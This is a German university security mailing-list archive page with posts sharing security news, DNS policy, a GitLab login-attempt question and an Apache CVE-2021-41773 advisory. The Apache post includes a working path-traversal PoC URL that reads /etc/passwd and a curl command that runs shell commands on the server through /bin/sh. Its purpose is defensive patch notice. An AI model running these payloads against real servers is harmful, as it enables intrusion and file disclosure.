October 2021 - rwth-security - lists.rwth-aachen.de

Security Engineering — Third Edition
by Bernd Kohler 10 Mar '22

10 Mar '22

Hallo zusammen, sofern nicht selber schon gesehen/-lesen hier [0] FYI "Security Engineering — Third Edition" "... from phone phreaks to Android malware and from SIM swaps and SS7 hacking to 5G ..." VG Bernd [0] https://www.cl.cam.ac.uk/~rja14/book.html -- Bernd Kohler IT Center Abteilung: Netze RWTH Aachen University Wendlingweg 10 52074 Aachen Tel: +49 241 80-29793 Fax: +49 241 80-22666 kohler(a)itc.rwth-aachen.de www.itc.rwth-aachen.de Social Media Kanäle des IT Centers: https://blog.rwth-aachen.de/itc/ https://www.facebook.com/itcenterrwth https://www.linkedin.com/company/itcenterrwth https://twitter.com/ITCenterRWTH https://www.youtube.com/channel/UCKKDJJukeRwO0LP-ac8x8rQ

1 1

GEANT - Safe Videoconferencing
by Bernd Kohler 28 Oct '21

28 Oct '21

Hallo zusammen, sofern nicht selber schon gesehen/-lesen hier [0] FYI "Safe Videoconferencing" Teil eines Blog-Beitrages bei GÉANT VG Bernd [0] https://connect.geant.org/2021/10/26/safe-videoconferencing-part-1 -- Bernd Kohler IT Center Abteilung: Netze RWTH Aachen University Wendlingweg 10 52074 Aachen Tel: +49 241 80-29793 Fax: +49 241 80-22666 kohler(a)itc.rwth-aachen.de www.itc.rwth-aachen.de Social Media Kanäle des IT Centers: https://blog.rwth-aachen.de/itc/ https://www.facebook.com/itcenterrwth https://www.linkedin.com/company/itcenterrwth https://twitter.com/ITCenterRWTH https://www.youtube.com/channel/UCKKDJJukeRwO0LP-ac8x8rQ

1 0

How Android Wallpaper Images Can Threaten Your Privacy
by Bernd Kohler 27 Oct '21

27 Oct '21

Hallo zusammen, sofern nicht selber schon gesehen/-lesen hier [0] FYI "How Android Wallpaper Images Can Threaten Your Privacy" VG Bernd [0] https://fingerprintjs.com/blog/how-android-wallpaper-images-threaten-privac… -- Bernd Kohler IT Center Abteilung: Netze RWTH Aachen University Wendlingweg 10 52074 Aachen Tel: +49 241 80-29793 Fax: +49 241 80-22666 kohler(a)itc.rwth-aachen.de www.itc.rwth-aachen.de Social Media Kanäle des IT Centers: https://blog.rwth-aachen.de/itc/ https://www.facebook.com/itcenterrwth https://www.linkedin.com/company/itcenterrwth https://twitter.com/ITCenterRWTH https://www.youtube.com/channel/UCKKDJJukeRwO0LP-ac8x8rQ

1 0

[Mailman] Security Release für version 2.1
by Bernd Kohler 25 Oct '21

25 Oct '21

Hallo zusammen, sofern nicht selber schon gesehen/-lesen hier [0] FYI "Mailman 2.1 security release" CVE-2021-42096 could allow a list member to discover the list admin password. CVE-2021-42097 could allow a list member to create a successful CSRF attack against another list member enabling takeover of the members account. VG Bernd [0] https://mail.python.org/archives/list/mailman-announce@python.org/thread/IK… -- Bernd Kohler IT Center Abteilung: Netze RWTH Aachen University Wendlingweg 10 52074 Aachen Tel: +49 241 80-29793 Fax: +49 241 80-22666 kohler(a)itc.rwth-aachen.de www.itc.rwth-aachen.de Social Media Kanäle des IT Centers: https://blog.rwth-aachen.de/itc/ https://www.facebook.com/itcenterrwth https://www.linkedin.com/company/itcenterrwth https://twitter.com/ITCenterRWTH https://www.youtube.com/channel/UCKKDJJukeRwO0LP-ac8x8rQ

1 0

GitLab fragwürdige Login-Versuche
by Thomas Schneider 18 Oct '21

18 Oct '21

Gute Tageszeit, der AStA hostet eine eigene GitLab-Instanz. Diese ist direkt per LDAP an unser Accountsystem angebunden, sprich man loggt sich per Username und Passwort dort ein (im Gegensatz zum Shibboleth bei git(-ce).rwth-aachen.de). In letzter Zeit wurde ich von Usern vermehrt darauf hingewiesen, dass diese eine Mail mit “Unlock Instructions” bekommen hätten: > Your GitLab account has been locked due to an excessive number of > unsuccessful sign in attempts. You can wait for your account to > automatically unlock in 10 minutes or you can click the link below to > unlock now. > […] > If you did not initiate these sign-in attempts, please reach out to > your administrator or enable two-factor authentication (2FA) on your > account. Da bekanntermaßen alle User sichere und pro Dienst jeweils unterschiedliche Passwörter verwenden, muss ich mir hier ja keine Sorgen machen. Ähm. Kommt das jemandem bekannt vor? Habt ihr dagegen Maßnahmen ergriffen, wenn ja welche? Ich müsste mal schauen, ob ich da in den Logs was relevantes finde, sodass man ggf. die üblichen verdächtigen IP-Adressbereiche sperren kann (und User im Urlaub oder soin entsprechenden Bereichen auf das RWTH-VPN verweisen) – das klingt doch nach einem Plan? Viele Grüße, Thomas -- Fachschaft I/1 Mathematik/Physik/Informatik der RWTH Aachen Thomas Schneider Campus Mitte: Augustinerbach 2a, 52062 Aachen Telefon: +49 241 80 94506 Informatikzentrum: Ahornstraße 55, Raum 2014, 52074 Aachen Telefon: +49 241 80 26741 https://www.fsmpi.rwth-aachen.de

1 0

Benutzung von Nameservern
by Jens Hektor 18 Oct '21

18 Oct '21

Hallo, die Nameserver der RWTH lauten 134.130.4.1 134.130.5.1 2a00:8a60:0:4::1 2a00:8a60:0:5::1 Keinesfalls lauten die Nameserver 1.1.1.1 8.8.8.8 8.8.4.4 Ich bitte darum, das umzusetzen, bevor ich mich gezwungen sehe, es aus guten Gründen zu erzwingen. Gute Gründe bitte hier in die Mailingliste, E-Mails an mich werde ich kommentarlos löschen. Gruß, Jens Hektor -- Dipl.-Phys. Jens Hektor, Computer Security Incidents Response Team RWTH Aachen University, Center for Computing and Communication Room 2.04, Wendlingweg 10, 52074 Aachen (Germany) Phone: +49 241 80 29206 - Fax: +49 241 80 22100 https://www.rz.rwth-aachen.de - csi(a)rwth-aachen.de

4 10

Skript bzgl. application layer protocol content confusion attack
by Bernd Kohler 10 Oct '21

10 Oct '21

Hallo zusammen, ich habe den Artikel [0] zu ALPACA ("Application Layer Protocols Allowing Cross-Protocol Attacks") mal zum Anlaß genommen, ein kleines Skript zu schreiben. Dieses prüft aber eigentlich nur, ob die empfohlene TLS extension Application Layer Protocol Negotiation (ALPN) aktiv ist oder nicht. SNI habe ich zudem ausgeklammert. Das Skript analysiert also nicht ALPACA, dazu fehlt bspw noch die Prüfung auf notwendiges SMTP/FTP/... sondern lediglich eine Empfehlung Dies habe ich mit Blick auf den von mir gesetzen Zeitrahmen (noch?) nicht implementiert. Verbesserte/korrigierte Versionen bitte gerne wieder zurück in diese Runde. Also fröhliches Testen der eigenen (!) Web-Server bzgl. ALPN. VG Bernd [0] https://www.heise.de/news/ALPACA-Attacke-Angreifer-koennten-mit-TLS-gesiche… [1] https://alpaca-attack.com/ -- Bernd Kohler IT Center Abteilung: Netze RWTH Aachen University Wendlingweg 10 52074 Aachen Tel: +49 241 80-29793 Fax: +49 241 80-22666 kohler(a)itc.rwth-aachen.de www.itc.rwth-aachen.de Social Media Kanäle des IT Centers: https://blog.rwth-aachen.de/itc/ https://www.facebook.com/itcenterrwth https://www.linkedin.com/company/itcenterrwth https://twitter.com/ITCenterRWTH https://www.youtube.com/channel/UCKKDJJukeRwO0LP-ac8x8rQ

1 2

Path traversal and file disclosure vulnerability in Apache HTTP Server 2.4.49 (CVE-2021-41773)
by Bernd Kohler 08 Oct '21

08 Oct '21

Hallo zusammen, sofern nicht selber schon gesehen/-lesen hier [0] FYI (siehe dazu au [1]) "Path traversal and file disclosure vulnerability in Apache HTTP Server 2.4.49 (CVE-2021-41773)" --> Update von Version 2.4.49 auf 2.4.50 --> "require all denied" aktivieren (per difault disabled) --> PoC: ${SERVER}/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd curl --data "A=|id>>/tmp/x;uname\$IFS-a>>/tmp/x" 'http://${SERVER}:${PORT}/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -vv --> ein passendes nmap Script gibt es unter [2] (man kann passwd auch durch hosts ersetzen ;) ) VG Bernd [0] https://httpd.apache.org/security/vulnerabilities_24.html [1] https://heise.de/-6209130 [2] https://raw.githubusercontent.com/RootUp/PersonalStuff/master/http-vuln-cve… -- Bernd Kohler IT Center Abteilung: Netze RWTH Aachen University Wendlingweg 10 52074 Aachen Tel: +49 241 80-29793 Fax: +49 241 80-22666 kohler(a)itc.rwth-aachen.de www.itc.rwth-aachen.de Social Media Kanäle des IT Centers: https://blog.rwth-aachen.de/itc/ https://www.facebook.com/itcenterrwth https://www.linkedin.com/company/itcenterrwth https://twitter.com/ITCenterRWTH https://www.youtube.com/channel/UCKKDJJukeRwO0LP-ac8x8rQ

1 1